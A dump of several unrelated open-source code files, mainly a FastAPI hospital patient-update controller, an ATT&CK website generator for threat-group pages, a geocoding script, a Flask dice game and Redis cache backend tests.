patient_id).first()\n if db_patient is None:\n return ResponseData.success({},\"Patient with this id does not exists\")\n print(f\"first_name {db_patient.first_name}\")\n dict2 = {\n \"first_name\": first_name if first_name != \"\" else db_patient.first_name,\n \"last_name\": last_name if last_name != \"\" else db_patient.last_name,\n \"contact_number\": contact_number if contact_number != \"\" else db_patient.contact_number,\n \"email\": email if email != \"\" else db_patient.email,\n \"gender\": gender if gender != \"\" else db_patient.gender,\n \"date_of_birth\": date_of_birth if date_of_birth != \"\" else db_patient.date_of_birth,\n \"blood_group\": blood_group if blood_group != \"\" else db_patient.blood_group,\n \"hospital_id\": hospital_id if hospital_id != \"\" else db_patient.hospital_id,\n 'profile_pic' : f\"patient_images/{profile_pic}\" if profile_pic != \"\" else f\"{db_patient.profile_pic}\",\n }\n for key,value in dict2.items():\n update_fields(dict2,key,value)\n db_patient_details = database.query(models.PatientDetails).filter(models.PatientDetails.id == patient_id).first()\n dict1 = {\n \"marital_status\":marital_status if marital_status != \"\" else db_patient_details.marital_status,\n \"height\": height if height != \"\" else db_patient_details.height,\n \"weight\": weight if weight != \"\" else db_patient_details.weight,\n \"emergency_contact_number\": emergency_contact_number if emergency_contact_number != \"\" else db_patient_details.emergency_contact_number,\n \"city\": city if city != \"\" else db_patient_details.city,\n \"smoking_habits\" : smoking_habits if smoking_habits != \"\" else db_patient_details.smoking_habits,\n \"alchol_consumption\": alchol_consumption if alchol_consumption != \"\" else db_patient_details.alchol_consumption,\n \"activity_level\": activity_level if activity_level != \"\" else db_patient_details.activity_level,\n \"occupation\" : occupation if occupation != \"\" else db_patient_details.occupation,\n }\n for key,value in dict1.items():\n update_fields(dict1,key,value)\n if len(allergy.split(\",\")) > 0 and allergy != \"\":\n database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(allergy).split(\",\"))):\n print(f'str(allergy).split(\",\")[i] {str(allergy).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n allergy_data = {\n \"patient_id\" : str(db_patient.id),\n \"allergy_id\" : str(allergy.split(\",\")[i])\n }\n db_patient_allergies_details = models.Patient_Allergies(**allergy_data)\n database.add(db_patient_allergies_details)\n database.commit()\n database.refresh(db_patient_allergies_details)\n if len(current_medication) > 0 :\n database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(current_medication).split(\",\"))):\n print(f'str(current_medication).split(\",\")[i] {str(current_medication).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n current_medications = {\n \"patient_id\" : str(db_patient.id),\n \"current_medication_id\" : str(current_medication.split(\",\")[i])\n }\n db_patient_current_medication_details = models.Patient_CurrentMedications(**current_medications)\n database.add(db_patient_current_medication_details)\n database.commit()\n database.refresh(db_patient_current_medication_details)\n if len(past_injury) > 0 :\n database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(past_injury).split(\",\"))):\n print(f'str(past_injury).split(\",\")[i] {str(past_injury).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n past_injuries = {\n \"patient_id\" : str(db_patient.id),\n \"past_injury_id\" : str(past_injury.split(\",\")[i])\n }\n db_patient_past_injuries_details = models.Patient_PastInjuries(**past_injuries)\n database.add(db_patient_past_injuries_details)\n database.commit()\n database.refresh(db_patient_past_injuries_details)\n if len(past_surgery) > 0 :\n database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(past_surgery).split(\",\"))):\n print(f'str(past_surgery).split(\",\")[i] {str(past_surgery).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n past_surgery = {\n \"patient_id\" : str(db_patient.id),\n \"past_surgery_id\" : str(past_surgery.split(\",\")[i])\n }\n db_patient_past_surgeries_details = models.Patient_PastSurgeries(**past_surgery)\n database.add(db_patient_past_surgeries_details)\n database.commit()\n database.refresh(db_patient_past_surgeries_details)\n if len(food_preference) > 0 :\n database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(food_preference).split(\",\"))):\n print(f'str(food_preference).split(\",\")[i] {str(food_preference).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n food_preferences = {\n \"patient_id\" : str(db_patient.id),\n \"food_preference_id\" : str(food_preference.split(\",\")[i])\n }\n db_patient_food_preference_details = models.Patient_FoodPreference(**food_preferences)\n database.add(db_patient_food_preference_details)\n database.commit()\n database.refresh(db_patient_food_preference_details)\n database.query(models.Patient).filter(models.Patient.id == patient_id).update({ models.Patient.id : patient_id,\n models.Patient.first_name: dict2[\"first_name\"],\n models.Patient.last_name : dict2[\"last_name\"],\n models.Patient.contact_number : dict2[\"contact_number\"],\n models.Patient.profile_pic : dict2[\"profile_pic\"],\n models.Patient.email : dict2[\"email\"],\n models.Patient.gender : dict2[\"gender\"],\n models.Patient.date_of_birth : dict2[\"date_of_birth\"],\n models.Patient.blood_group : dict2[\"blood_group\"],\n # models.Patient.hospital_id : dict2[\"hospital_id\"],\n })\n database.query(models.PatientDetails).filter(models.PatientDetails.id == patient_id).update({\n models.PatientDetails.id : patient_id,\n models.PatientDetails.marital_status : dict1[\"marital_status\"],\n models.PatientDetails.height : dict1[\"height\"],\n models.PatientDetails.weight : dict1[\"weight\"],\n models.PatientDetails.emergency_contact_number : dict1[\"emergency_contact_number\"],\n models.PatientDetails.city : dict1[\"city\"],\n models.PatientDetails.smoking_habits : dict1[\"smoking_habits\"],\n models.PatientDetails.alchol_consumption : dict1[\"alchol_consumption\"],\n models.PatientDetails.activity_level : dict1[\"activity_level\"],\n models.PatientDetails.occupation : dict1[\"occupation\"] \n })\n database.flush()\n database.commit()\n # dict1.update(dict2)\n # allergies_list = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_allergies\"] = allergies_list\n # medications_list = database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_current_medications\"] = medications_list\n # injuries_list = database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_past_injuries\"] = injuries_list\n # surgeries_list = database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_past_surgeries\"] = surgeries_list\n # food_preference_list = database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_food_preference\"] = food_preference_list\n return ResponseData.success({},\"Patient details updated successfully\")\n\n\ndef get_allergies_by_id(database: Session):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n allergies_list = database.query(models.Allergies).filter().all()\n return ResponseData.success(allergies_list,\"Allergies details fetched successfully\")\n # if id is None:\n # allergies_list = database.query(models.Allergies).filter().all()\n # return ResponseData.success(allergies_list,\"Allergies details fetched successfully\")\n # db_allergy_details = database.query(models.Allergies).filter(models.Allergies.id == id).first()\n # if db_allergy_details is None:\n # return ResponseData.success_without_data(\"Id is invalid or allergies does not exists\")\n # return ResponseData.success(db_allergy_details.__dict__,\"Allergies details fetched successfully\")\n\ndef add_allergy(database: Session,allergy_name):\n \"\"\"Function to add allergy\"\"\"\n if allergy_name is None:\n return ResponseData.success_without_data(\"Please provide allergy name\")\n db_allergy_details = database.query(models.Allergies).filter(models.Allergies.allergy == allergy_name).first()\n if db_allergy_details:\n return ResponseData.success_without_data(\"Allergy with this name already exists\")\n data = {\n \"allergy\" : allergy_name\n }\n db_allergy_details = models.Allergies(**data)\n database.add(db_allergy_details)\n database.commit()\n database.refresh(db_allergy_details)\n return ResponseData.success(db_allergy_details.__dict__,\"Allergy added successfully\")\n\ndef add_food_preference(database: Session,food_preference_name):\n \"\"\"Function to add food preferences\"\"\"\n if food_preference_name is None:\n return ResponseData.success_without_data(\"Please provide food preference name\")\n db_food_preference_details = database.query(models.FoodPreference).filter(models.FoodPreference.food_preference == food_preference_name).first()\n if db_food_preference_details:\n return ResponseData.success_without_data(\"Allergy with this name already exists\")\n data = {\n \"food_preference\" : food_preference_name\n }\n db_food_preference = models.FoodPreference(**data)\n database.add(db_food_preference)\n database.commit()\n database.refresh(db_food_preference)\n return ResponseData.success(db_food_preference.__dict__,\"Food preference added successfully\")\n\ndef add_current_medication(database: Session,current_medication_name):\n \"\"\"Function to add current medication\"\"\"\n if current_medication_name is None:\n return ResponseData.success_without_data(\"Please provide current medication name\")\n db_current_medication_details = database.query(models.CurrentMedications).filter(models.CurrentMedications.current_medication == current_medication_name).first()\n if db_current_medication_details:\n return ResponseData.success_without_data(\"Current medication with this name already exists\")\n data = {\n \"current_medication\" : current_medication_name\n }\n db_current_medication_details = models.CurrentMedications(**data)\n database.add(db_current_medication_details)\n database.commit()\n database.refresh(db_current_medication_details)\n return ResponseData.success(db_current_medication_details.__dict__,\"Current medication added successfully\")\n\ndef add_past_injury(database: Session,injury_name):\n \"\"\"Function to add past injury\"\"\"\n if injury_name is None:\n return ResponseData.success_without_data(\"Please provide past injury name\")\n db_injury_details = database.query(models.PastInjuries).filter(models.PastInjuries.past_injury == injury_name).first()\n if db_injury_details:\n return ResponseData.success_without_data(\"Injury with this name already exists\")\n data = {\n \"past_injury\" : injury_name\n }\n db_past_injury_details = models.PastInjuries(**data)\n database.add(db_past_injury_details)\n database.commit()\n database.refresh(db_past_injury_details)\n return ResponseData.success(db_past_injury_details.__dict__,\"Past injuries added successfully\")\n\ndef add_past_surgery(database: Session,surgery_name):\n \"\"\"Function to add past surgery\"\"\"\n if surgery_name is None:\n return ResponseData.success_without_data(\"Please provide past surgery name\")\n db_allergy_details = database.query(models.PastSurgeries).filter(models.PastSurgeries.past_surgery == surgery_name).first()\n if db_allergy_details:\n return ResponseData.success_without_data(\"Surgery with this name already exists\")\n data = {\n \"past_surgery\" : surgery_name\n }\n db_past_surgery_details = models.PastSurgeries(**data)\n database.add(db_past_surgery_details)\n database.commit()\n database.refresh(db_past_surgery_details)\n return ResponseData.success(db_past_surgery_details.__dict__,\"Past surgeries added successfully\")\n\ndef get_current_medication_by_id(database: Session):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n current_medications_list = database.query(models.CurrentMedications).filter().all()\n return ResponseData.success(current_medications_list,\"Patient current medications details fetched successfully\")\n\ndef get_food_preferences(database: Session):\n \"\"\"Function to get_food_preferences\"\"\"\n food_preferences = database.query(models.FoodPreference).filter().all()\n return ResponseData.success(food_preferences,\"Food preference details fetched successfully\")\n # if id is None:\n # current_medications_list = database.query(models.CurrentMedications).filter().all()\n # return ResponseData.success(current_medications_list,\"Patient current medications details fetched successfully\")\n # db_current_medications_details = database.query(models.CurrentMedications).filter(models.CurrentMedications.id == id).first()\n # if db_current_medications_details is None:\n # return ResponseData.success_without_data(\"Id is invalid or current medications does not exists\")\n # return ResponseData.success(db_current_medications_details.__dict__,\"Current medications details fetched successfully\")\n\ndef get_past_injuries_by_id(database: Session):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n past_injuries_list = database.query(models.PastInjuries).filter().all()\n return ResponseData.success(past_injuries_list,\"Past injuries details fetched successfully\")\n # if id is None:\n # past_injuries_list = database.query(models.PastInjuries).filter().all()\n # return ResponseData.success(past_injuries_list,\"Past injuries details fetched successfully\")\n # db_past_injuries_details = database.query(models.PastInjuries).filter(models.PastInjuries.id == id).first()\n # if db_past_injuries_details is None:\n # return ResponseData.success_without_data(\"Id is invalid or past injuries does not exists\")\n # return ResponseData.success(db_past_injuries_details.__dict__,\"Past injuries details fetched successfully\")\n\ndef get_past_surgeries_by_id(database: Session):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n past_surgeries_list = database.query(models.PastSurgeries).filter().all()\n return ResponseData.success(past_surgeries_list,\"Patient past surgeries details fetched successfully\")\n # if id is None:\n # past_surgeries_list = database.query(models.PastSurgeries).filter().all()\n # return ResponseData.success(past_surgeries_list,\"Patient past surgeries details fetched successfully\")\n # db_past_surgeries_details = database.query(models.PastSurgeries).filter(models.PastSurgeries.id == id).first()\n # if db_past_surgeries_details is None:\n # return ResponseData.success_without_data(\"Id is invalid or past surgeries does not exists\")\n # return ResponseData.success(db_past_surgeries_details.__dict__,\"Past surgeries details fetched successfully\")","repo_name":"RxMobile-Dummy/fastapi-HMS","sub_path":"patient/app/api/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":36312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22419694982","text":"import os\nimport json\nimport collections\nimport re\nimport markdown\nfrom .. import site_config\nfrom . import groups_config\nfrom modules import util\nfrom modules.util import stixhelpers\nfrom modules.util import relationshiphelpers\n\n\ndef generate_groups():\n \"\"\"Responsible for verifying group directory and starting off \n group markdown generation\n \"\"\"\n\n # Create content pages directory if does not already exist\n util.buildhelpers.create_content_pages_dir()\n \n # Move templates to templates directory\n util.buildhelpers.move_templates(groups_config.module_name, groups_config.groups_templates_path)\n\n # Create content pages directory if does not already exist\n util.buildhelpers.create_content_pages_dir()\n\n # Verify if directory exists\n if not os.path.isdir(groups_config.group_markdown_path):\n os.mkdir(groups_config.group_markdown_path)\n\n #Generates the markdown files to be used for page generation\n group_generated = generate_markdown_files()\n\n if not group_generated:\n util.buildhelpers.remove_module_from_menu(groups_config.module_name)\n\ndef generate_markdown_files():\n \"\"\"Responsible for generating group index page and getting shared data for\n all groups\n \"\"\"\n\n has_group = False\n\n group_list = util.relationshipgetters.get_group_list()\n\n group_list_no_deprecated_revoked = util.buildhelpers.filter_deprecated_revoked(group_list)\n\n if group_list_no_deprecated_revoked:\n has_group = True\n\n if has_group:\n data = {}\n\n # Amount of characters per category\n group_by = 2\n\n notes = util.relationshipgetters.get_objects_using_notes()\n side_menu_data = util.buildhelpers.get_side_menu_data(\"Groups\", \"/groups/\", group_list_no_deprecated_revoked)\n data['side_menu_data'] = side_menu_data\n\n side_menu_mobile_view_data = util.buildhelpers.get_side_menu_mobile_view_data(\"groups\", \"/groups/\", group_list_no_deprecated_revoked, group_by)\n data['side_menu_mobile_view_data'] = side_menu_mobile_view_data\n\n data['groups_table'] = get_groups_table_data(group_list_no_deprecated_revoked)\n data['groups_list_len'] = str(len(group_list_no_deprecated_revoked))\n \n subs = groups_config.group_index_md + json.dumps(data)\n\n with open(os.path.join(groups_config.group_markdown_path, \"overview.md\"), \"w\", encoding='utf8') as md_file:\n md_file.write(subs)\n\n #Create the markdown for the enterprise groups in the STIX\n for group in group_list:\n generate_group_md(group, side_menu_data, side_menu_mobile_view_data, notes)\n \n return has_group\n\ndef generate_group_md(group, side_menu_data, side_menu_mobile_view_data, notes):\n \"\"\"Responsible for generating markdown of all groups\"\"\"\n\n attack_id = util.buildhelpers.get_attack_id(group)\n\n if attack_id:\n data = {}\n\n data['attack_id'] = attack_id\n\n data['side_menu_data'] = side_menu_data\n data['side_menu_mobile_view_data'] = side_menu_mobile_view_data\n data['notes'] = notes.get(group['id'])\n\n # External references\n ext_ref = group[\"external_references\"]\n\n dates = util.buildhelpers.get_created_and_modified_dates(group)\n \n if dates.get('created'):\n data['created'] = dates['created']\n\n if dates.get('modified'):\n data['modified'] = dates['modified']\n\n if group.get(\"name\"):\n data['name'] = group['name']\n \n if group.get(\"x_mitre_version\"):\n data['version'] = group[\"x_mitre_version\"]\n\n if isinstance(group.get(\"x_mitre_contributors\"),collections.Iterable):\n data['contributors_list'] = group[\"x_mitre_contributors\"]\n\n # Get initial reference list\n reference_list = {'current_number': 0}\n\n # Get initial reference list from group object\n reference_list = util.buildhelpers.update_reference_list(reference_list, group)\n\n if group.get(\"description\"):\n data['descr'] = group['description']\n \n if group.get('x_mitre_deprecated'):\n data['deprecated'] = True\n\n # Get technique data for techniques used table\n data['technique_table_data'] = get_techniques_used_by_group_data(group, reference_list)\n\n # Get navigator layers for this group\n layers = util.buildhelpers.get_navigator_layers(\n data['name'], \n data[\"attack_id\"],\n \"group\",\n data[\"version\"] if \"version\" in data else None,\n data['technique_table_data'], \n )\n\n data[\"layers\"] = []\n for layer in layers:\n with open(os.path.join(groups_config.group_markdown_path, \"-\".join([data['attack_id'], \"techniques\", layer[\"domain\"]]) + \".md\"), \"w\", encoding='utf8') as layer_json:\n subs = site_config.layer_md.substitute({\n \"attack_id\": data[\"attack_id\"],\n \"path\": \"groups/\" + data[\"attack_id\"],\n \"domain\": layer[\"domain\"]\n })\n subs = subs + layer[\"layer\"]\n layer_json.write(subs)\n data[\"layers\"].append({\n \"domain\": layer[\"domain\"],\n \"filename\": \"-\".join([data[\"attack_id\"], layer[\"domain\"], \"layer\"]) + \".json\",\n \"navigator_link\" : site_config.navigator_link\n })\n\n # Grab software data for Software table\n data['software_data'], data['add_software_ref'] = get_software_table_data(group, reference_list)\n\n if group.get('aliases'):\n data['alias_descriptions'] = util.buildhelpers.get_alias_data(group['aliases'][1:], ext_ref)\n\n data['citations'] = reference_list\n \n if isinstance(group.get(\"aliases\"), collections.Iterable):\n data['aliases_list'] = group[\"aliases\"][1:]\n \n data['versioning_feature'] = site_config.check_versions_module()\n\n subs = groups_config.group_md.substitute(data)\n subs = subs + json.dumps(data)\n\n # Write out the markdown file\n with open(os.path.join(groups_config.group_markdown_path, data['attack_id'] + \".md\"), \"w\", encoding='utf8') as md_file:\n md_file.write(subs)\n\ndef get_groups_table_data(group_list):\n \"\"\"Responsible for generating group table data for the group index page\"\"\"\n\n groups_table_data = []\n\n #Now the table on the right, which is made up of group data\n for group in group_list:\n\n attack_id = util.buildhelpers.get_attack_id(group)\n\n if attack_id:\n row = {}\n\n row['id'] = attack_id\n\n if group.get(\"name\"):\n row['name'] = group['name']\n\n if group.get(\"description\"):\n row['descr'] = group[\"description\"]\n\n if group.get('x_mitre_deprecated'):\n row['deprecated'] = True\n\n if isinstance(group.get(\"aliases\"), collections.Iterable):\n row['aliases_list'] = group[\"aliases\"][1:]\n \n groups_table_data.append(row)\n \n return groups_table_data\n\ndef get_techniques_used_by_group_data(group, reference_list):\n \"\"\"Given a group and its reference list, get the techniques used by the\n group. Check the reference list for citations, if not found\n in list, add it.\n \"\"\"\n \n technique_list = {}\n\n techniques_used_by_groups = util.relationshipgetters.get_techniques_used_by_groups()\n\n if techniques_used_by_groups.get(group.get('id')):\n for technique in techniques_used_by_groups[group['id']]:\n # Do not add if technique is deprecated\n if not technique['object'].get('x_mitre_deprecated'):\n technique_list = util.buildhelpers.technique_used_helper(technique_list, technique, reference_list)\n\n technique_data = []\n for item in technique_list:\n technique_data.append(technique_list[item])\n # Sort by technique name\n technique_data = sorted(technique_data, key=lambda k: k['name'].lower())\n\n # Sort by domain name\n technique_data = sorted(technique_data, key=lambda k: [site_config.custom_alphabet.index(c) for c in k['domain'].lower()])\n return technique_data\n\ndef get_software_table_data(group, reference_list):\n \"\"\"Given a group, get software table data\"\"\"\n\n software_list = {}\n\n reference = False\n\n # Creating map for tools/malware used by groups \n # and techniques used by malware/tools\n tools_and_malware = [{\n 'software': util.relationshipgetters.get_tools_used_by_groups(), \n 'techniques': util.relationshipgetters.get_techniques_used_by_tools()\n }, \n {\n 'software': util.relationshipgetters.get_malware_used_by_groups(),\n 'techniques': util.relationshipgetters.get_techniques_used_by_malware()\n }]\n\n # Get malware or tools used by group\n for pairing in tools_and_malware:\n if pairing['software'].get(group.get('id')):\n for software in pairing['software'][group['id']]:\n\n software_id = software['object']['id']\n\n # Check if software not already in software_list dict\n if software_id not in software_list:\n\n attack_id = util.buildhelpers.get_attack_id(software['object'])\n \n if attack_id:\n software_list[software_id] = {}\n\n software_list[software_id]['id'] = attack_id\n software_list[software_id]['name'] = software['object']['name']\n\n if software['relationship'].get('description'):\n if reference == False:\n reference = True\n\n # Get filtered description\n software_list[software_id]['descr'] = software['relationship']['description']\n # Update reference list\n reference_list = util.buildhelpers.update_reference_list(reference_list, software['relationship'])\n\n # Check if techniques exists, add techniques used by software\n if pairing['techniques'].get(software_id):\n \n if 'techniques' not in software_list[software_id]:\n software_list[software_id]['techniques'] = []\n\n for technique in pairing['techniques'][software_id]:\n\n tech_data = {}\n\n t_id = util.buildhelpers.get_attack_id(technique['object'])\n\n if t_id:\n if util.buildhelpers.is_sub_tid(t_id):\n tech_data['parent_id'] = util.buildhelpers.get_parent_technique_id(t_id)\n tech_data['id'] = util.buildhelpers.get_sub_technique_id(t_id)\n tech_data['name'] = util.buildhelpers.get_technique_name(tech_data['parent_id'])\n tech_data['sub_name'] = technique['object']['name']\n else:\n tech_data['id'] = t_id\n tech_data['name'] = technique['object']['name']\n\n software_list[software_id]['techniques'].append(tech_data)\n\n # Moving it to an array because jinja does not like to loop\n # through dictionaries\n data = []\n for item in software_list:\n if \"techniques\" in software_list[item]:\n software_list[item]['techniques'] = sorted(software_list[item]['techniques'], key=lambda k: k['name'].lower())\n data.append(software_list[item])\n data = sorted(data, key=lambda k: k['name'].lower())\n\n return data, reference","repo_name":"276793422/attack-website","sub_path":"modules/groups/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":11914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"37300220844","text":"class Solution:\n def longestSquareStreak(self, nums: List[int]) -> int:\n nums.sort(reverse = True)\n l = {}\n for el in nums:\n if el * el in l:\n l[el] = l[el * el] + 1\n else:\n l[el] = 1\n res = max(l.values())\n if res < 2:\n return -1\n return res","repo_name":"theabbie/leetcode","sub_path":"longest-square-streak-in-an-array.py","file_name":"longest-square-streak-in-an-array.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"34674033023","text":"import requests\r\n\r\n#Pour ne pas avoir des candidats, il faut enlever les commentaire et la db\r\n\r\n#conn = sqlite3.connect('data_full.db')\r\n#cursor = conn.cursor()\r\n\r\n\r\nimport pandas as pd\r\nfrom pre_training import *\r\nimport numpy as np\r\n\r\ndf = pd.read_csv(\"data_questionnaires.csv\",sep = \";\")\r\ndf = df.drop(columns = [\"ID de la réponse\",\"Date de soumission\",\"Dernière page\", \"Langue de départ\",\"Tête de série\", \"Date de lancement\", \"Date de la dernière action\"])\r\nnames_columns = df.columns\r\n\r\n\r\n\r\n#22 : nom lycée dans colonne 22\r\n\r\n\r\n\r\ndef adresse_to_coordonnees(string):\r\n def string_to_request(string):\r\n replace = string.replace(\" \",\"+\")\r\n return replace\r\n url = 'https://nominatim.openstreetmap.org/search.php?q=' + string_to_request(string) + '&format=jsonv2'\r\n response = requests.get(url)\r\n if response.json() != []:\r\n json = response.json()[0]\r\n latitude = float(json[\"lat\"])\r\n longitude = float(json[\"lon\"])\r\n boolean = True\r\n else:\r\n boolean = False\r\n latitude = 0\r\n longitude = 0\r\n return boolean,longitude,latitude\r\n\r\ndef make_coord(df):\r\n colonne_lycee = df[df.columns[22]]\r\n liste_longitude = []\r\n liste_latitude = []\r\n liste_index = []\r\n for index,lycee in enumerate(colonne_lycee):\r\n try:\r\n boolean,longitude,latitude = adresse_to_coordonnees(lycee)\r\n if boolean:\r\n print(longitude,latitude)\r\n liste_index.append(index)\r\n liste_longitude.append(longitude)\r\n liste_latitude.append(latitude)\r\n else:\r\n print(\"à chercher\")\r\n except:\r\n print(\"non renseigné\")\r\n return liste_index,liste_latitude,liste_longitude\r\n \r\n\r\n\r\n","repo_name":"ProfesseurGibaud/HGGSP_Data_Science","sub_path":"coord lycée.py","file_name":"coord lycée.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25805627570","text":"import time\nfrom datetime import datetime\n\nfrom models.Job import Job\n\n\ndef current_timestamp():\n return int(datetime.timestamp(datetime.now()))\n\n\ndef lambda_handler(event, context):\n print('Incoming event: {}'.format(event))\n processed_jobs = []\n for record in event['Records']:\n # registering job\n job_id = record['messageId']\n new_job = Job(job_id=job_id, status='CREATED',\n creation_date=current_timestamp())\n new_job.save()\n\n # job processing code here\n time.sleep(2)\n\n # update job status\n new_job.status = 'DONE'\n new_job.last_updated_data_sec = current_timestamp()\n new_job.save()\n processed_jobs.append(job_id)\n return 'Jobs processed: {}'.format(processed_jobs)\n","repo_name":"epam/aws-syndicate","sub_path":"examples/python/demo/sample-python-project/lambdas/job-processor/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"} +{"seq_id":"72196041641","text":"from flask import Flask, request, render_template\nfrom random import randint\n\napp = Flask(__name__)\n\ndef roll_dice():\n result = randint(1,6)\n return result\n\n@app.route('/')\ndef index():\n section = 'Greetings, human'\n return render_template('index.html',\n section=section)\n\n\n@app.route('/dice')\ndef play_dice_game():\n name = request.args.get('name')\n die1 = roll_dice()\n die2 = roll_dice()\n \n if die1 == die2:\n return \"You won! You rolled \" + str(die1) + \" and \" + str(die2) + \".\"\n\n return render_template('dice.html',\n name=name,\n die1=die1,\n die2=die2)\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"aucoeur/dice_game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12449624317","text":"from datetime import timedelta\nfrom time import sleep\nfrom typing import Iterable\n\nfrom pytest import fixture, raises\n\nfrom cachetory.backends.sync import RedisBackend\nfrom cachetory.private.datetime import make_deadline\nfrom tests.support import if_redis_enabled\n\n\n@fixture\ndef backend() -> Iterable[RedisBackend]:\n with RedisBackend.from_url(\"redis://localhost:6379\") as backend:\n backend.clear()\n try:\n yield backend\n finally:\n backend.clear()\n\n\n@if_redis_enabled\ndef test_get_existing(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"hello\")\n assert backend.get(\"foo\") == b\"hello\"\n\n\n@if_redis_enabled\nasync def test_get_missing(backend: RedisBackend) -> None:\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_set_default(backend: RedisBackend) -> None:\n assert backend.set(\"foo\", b\"hello\", if_not_exists=True)\n assert not backend.set(\"foo\", b\"world\", if_not_exists=True)\n assert backend.get(\"foo\") == b\"hello\"\n\n\n@if_redis_enabled\nasync def test_delete_existing(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"hello\")\n assert backend.delete(\"foo\")\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_delete_missing(backend: RedisBackend) -> None:\n assert not backend.delete(\"foo\")\n\n\n@if_redis_enabled\nasync def test_set_get_many(backend: RedisBackend) -> None:\n backend.set_many([(\"non-empty\", b\"foo\"), (\"empty\", b\"\")])\n assert list(backend.get_many(\"non-empty\", \"missing\", \"empty\")) == [(\"non-empty\", b\"foo\"), (\"empty\", b\"\")]\n\n\n@if_redis_enabled\nasync def test_set_with_ttl(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"bar\", time_to_live=timedelta(seconds=0.25))\n assert backend.get(\"foo\") == b\"bar\"\n sleep(0.5)\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_expire_at(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"bar\")\n backend.expire_at(\"foo\", make_deadline(timedelta(seconds=0.25)))\n assert backend.get(\"foo\") == b\"bar\"\n sleep(0.5)\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_expire_in(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"bar\")\n backend.expire_in(\"foo\", timedelta(seconds=0.25))\n assert backend.get(\"foo\") == b\"bar\"\n sleep(0.5)\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_clear(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"bar\")\n backend.clear()\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_get_empty_value(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"\")\n assert backend.get(\"foo\") == 